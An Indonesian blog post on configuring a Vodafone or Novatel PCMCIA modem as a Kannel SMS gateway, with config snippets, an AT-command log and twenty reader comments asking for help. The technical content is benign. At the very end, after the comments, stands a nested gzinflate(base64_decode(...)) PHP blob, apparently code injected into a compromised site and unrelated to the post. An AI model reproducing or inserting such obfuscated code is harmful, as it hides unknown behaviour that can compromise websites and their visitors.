Delicious

Archives

Categories

Vodafone modem on Kannel

  ozzie / 18/09/2007


kebetulan dapet suplay beberapa modem PCMCIA :D.. lalu dipakelah yang Vodafone Mobile Connect Card 3G/GPRS;)) tinggal digabung CardBus <:-p **[Meneruskan Petualangan Kemaren]
Vodafone Modem

Dengan bahan dasar slackware 10.2, Kannel, Mysql, Apache, PHP, MRTG dan campuran Wap-MRTG, .. dan lain-lain. Awalnya sempet pusing juga nge-detect modem PCMCIA nya. berhubung pake Kannel yg jadi engine SMS/WAP nya.. obarak-abrik dokumentasi AT-Command pake minicom ternyata beda di init-stringnya

group = modems
id = vodafone
speed = 115200
name = VodaFone3G
detect-string = “GlobeTrotter”
init-string = “AT+CNMI=1,2,0,0,0″

udah dapet group modems, lalu pasang di group smc

group = smsc
smsc = at
smsc-id = vodafone
modemtype = vodafone
device = /dev/modem

jalanin bearerbox sekalian liat log

………
2007-09-18 01:54:33 [336] [6] INFO: AT2[vodafone]: init device
2007-09-18 01:54:33 [336] [6] INFO: AT2[vodafone]: speed set to 115200
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: –> ATZ^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- ATZ
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- AT
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT&F^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- AT&F
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> ATE0^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- ATE0
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT+IFC=2,2^M
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:33 [336] [6] DEBUG: AT2[vodafone]: --> AT+CPIN?^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- +CPIN: READY
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CSCA=”+62855000000″^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CMGF=0^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CSMS=?^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- +CSMS: (0-1)
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: <-- OK
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: --> AT+CNMI=1,2,0,0,0^M
2007-09-18 01:54:34 [336] [6] DEBUG: AT2[vodafone]: < -- OK
2007-09-18 01:54:34 [336] [6] INFO: AT2[vodafone]: AT SMSC successfully opened.

Tadaaaa….
diteruskan bikin group sms-service di kannel :

group = sms-service
keyword = default
text = “Mana Command-nya Om??”

Bagian ini cuma default kalo parameter salah, dan bakalan ngirim sms balik ke sender


group = sms-service
keyword = PORT
get-url = “http://kasur.tahanan.web.id/kerja.php?port=%k&value=%S”
max-message = 3

yang nantinya tinggal kirim sms dengan “Ketik: PORT < spasi > A < spasi > 2″ kirim ke no yang akan meng-eksekusi http://kasur.tahanan.web.id/kerja.php?port=A&value=2.. (dikarenakan Beda Mesin dengan SMS-gateway jadi gak pake http://localhost)


« »


20 Responses to “Vodafone modem on Kannel”

  1. bagol Says:

    jago banget lo ji,,,,ajarin gw donk booss..!!
    pengen pinter kaya lo gw….heheeeee..
    ajarin yah…
    gw juga salah satu client di vip
    warnet gw namanya MyNet
    di daerah mabes Tni cilangkap
    yg ngurusin fahcri…

  2. bagol Says:

    gw ada ym ji….
    add ya…ogah_negor

  3. Mhins Says:

    Ass, Saya sangat tertarik sekali dengan proyek ini dan yang ingi saya tahu bagaimana mendeteksi modem pcmcia maksud saya sama menggunakan yg versi usbnya dan kernel versi berapa yang sopport n mohon dijelaskan dari awalnya ya.
    Makasih sebelumnnya

  4. udeystar Says:

    Cangcing Zi…. Canggih Cing….
    xixixixixixi.
    Met Puasa ja zi… alat perangnya juga dipuasain donk…. wakakakakak…

  5. mhins Says:

    Numpang tanya lagi nh, saya rencana mau membeli modem pcmcia seperti ulasan diatas tapi, gak ada saya temukan novatel merlin u630, pakah bisa dipake atau dkenalin oleh kannel?

  6. ozzie Says:

    ini yg sayah pake:

    root@i386:~# cardctl info
    PRODID_1=”Novatel Wireless”
    PRODID_2=”Merlin UMTS Modem”
    PRODID_3=”U630″
    PRODID_4=”"
    MANFID=00a4,0276
    FUNCID=2

  7. mhins Says:

    Makasih ya atas infox n mohon dong dijelasin dari awalnya bagaimana cara kerja dari sistem ini apakah mengirim pesan melalui wap atau menggunakan langsung sms biasa yang saya baca kan pengirimanx melalui localhost kan dan juga mas untuk apa wap-mtrg diatas?

  8. MHINS Says:

    Mas Sy udah beli merlin u630 n saya pake suse 10.1 tapi pas mo nginstall kannelx kok error ya? mohon saran ya untuk pake distro apa ya?

  9. ozzie Says:

    hmm…:-? Error dimanah om?:-?? bole tau error message nya dimanah?;));))

    sayah pake slackware 10.2 kok ;)

  10. MHINS Says:

    Mas Mohon Penjelasan rincinya gimana pake kannelnya dan sms.conf diletakan di folder mana? sorry mas Banyakan nanya Maklum baru belajar sh…….

  11. ozzie Says:

    sebenernya sih bebas, di mana ajah.. cuman pas mo running harus di ikutin path lokasi kannel.conf nya. ;)
    #bearerbox /path/to/kannel.conf
    atau:
    #smsbox /path/to/kannel.conf

  12. Mhins Says:

    Udah dicoba mas kok error lagi n Boleh nyontek g kannel config untuk merlin u630?

  13. Jojo Says:

    Ikutan nimbrung nh, Kenetulan aku juga make modem gsm mo nyoba pake kannel tapi maselehnye tu program nya pake apa nulisnya trus bagemana nentuiin itu tuh id n namex? Gitu aja dulu Makash sblmx

  14. ozzie Says:

    kyknya source nya pake C..
    nentuin id ama namanya seperti yg ada di manual nya (http://kannel.org/download/1.4.1/userguide-1.4.1/userguide.html)

    ini config untuk merlin u630 :
    http://kamar.ozzie.web.id/kannel.conf

  15. Mhins Says:

    Makasih ya mas, tapi ini loe,memang merlin tuh sama config kayak vodafone n apakah ke 2 card trsebut sama ya mas?

  16. MHINS Says:

    Mas sy g ngerti tentang setingan AT-nya novatel U630 bisa bantu nas? Sy coba seperti pada toturial ini tapi g berhasil

  17. tonny Says:

    pak kalau source kannel yang komplit di ftp indonesia dimana ya? kantor saya diblok ukuran limit file nya 1mb. tapi kalau pakai ftp bisa.
    pernah pakai dengan database postgre ndak?

  18. ELectro boy Says:

    bosss….bLeh ajarin qw bkin blog ga??

    crana misalkan Link”na bsa bnyak,
    msalkan kategori bsa da bnyak Link tu gmn y???

  19. ELectro boy Says:

    oia gmbar’a qw pke y…

  20. dedet Says:

    salut membantu banget….
    numpang nanya biar kanelnya bisa proses auto respnya gmana yaa,
    uda buat seh tapi pada saat ada sms yang masuk cuman id yang pertama aja yang ke panggil oleh kannelnya. ak pake intervase web.
    mohon bantuanya lagi buat TA nieh..
    GBU


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>